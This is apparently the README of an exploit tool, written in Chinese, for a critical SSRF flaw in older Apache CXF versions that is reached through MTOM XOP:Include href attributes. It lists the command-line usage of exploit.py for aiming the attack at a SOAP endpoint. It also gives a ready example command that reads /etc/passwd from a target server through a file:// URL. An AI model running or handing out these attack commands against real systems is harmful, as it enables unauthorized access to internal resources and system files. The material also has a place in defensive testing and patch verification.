Apache CXF 通过 MTOM XOP:Include 的 SSRF | CVSS 9.8 严重
Apache CXF < 3.5.5 / < 3.4.10 允许通过未验证的 MTOM 编码 SOAP 请求中的 XOP:Include href 属性进行服务器端请求伪造。
python3 exploit.py -t <TARGET_URL> -s <SSRF_URL> -d <DOMAIN>
-t, --target - 易受攻击的 CXF SOAP 端点(必需)-s, --ssrf-url - 要窃取的内部 URL(必需)-d, --domain - 目标域名(默认:localhost)--plain-soap - 使用纯 SOAP 而非 MTOM# Read /etc/passwd
python3 exploit.py -t http://target.com:8080/employeeservice -s file:///etc/passwd -d target.com